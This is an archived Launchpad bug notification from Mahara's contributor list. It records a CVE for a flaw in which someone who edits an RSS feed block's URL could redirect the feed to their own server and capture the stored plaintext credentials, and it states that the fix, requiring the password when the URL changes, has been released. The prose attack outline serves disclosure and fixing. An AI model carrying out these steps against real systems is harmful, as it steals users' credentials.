mahara-contributors team mailing list archive

Thread
Date

[Bug 1172096] Re: Require re-entering RSS feed password when you change the URL

To: mahara-contributors@xxxxxxxxxxxxxxxxxxx
From: Kristina Hoeppner <1172096@xxxxxxxxxxxxxxxxxx>
Date: Mon, 24 Nov 2014 00:18:31 -0000
Reply-to: Bug 1172096 <1172096@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2013-7413

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: Subscription for all Mahara Contributors -- please ask on #mahara-dev or mahara.org forum before editing or unsubscribing it!
https://bugs.launchpad.net/bugs/1172096

Title:
  Require re-entering RSS feed password when you change the URL

Status in Mahara ePortfolio:
  Fix Released
Status in Mahara 1.5 series:
  Fix Released
Status in Mahara 1.6 series:
  Fix Released
Status in Mahara 1.7 series:
  Fix Released

Bug description:
  If we implement a fix for
  https://bugs.launchpad.net/mahara/+bug/1016253 (encrypt RSS feed
  usernames & passwords) there's still a potential attack vector in the
  URL to the RSS feed.

  Attack:
  1a. Masquerade as the user
  1b. OR get the user to give you a copy of the Page containing the RSS feed block
  2. Enter the settings for the RSS feed block (or its copy)
  3. Change the URL of the RSS feed to point at your own server

  Result:
  When Mahara next refreshes the RSS feed, it will send the plaintext username and password to your server, where you can easily capture it.

  Fix:
  Require a user to re-enter the password when they change the URL

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1172096/+subscriptions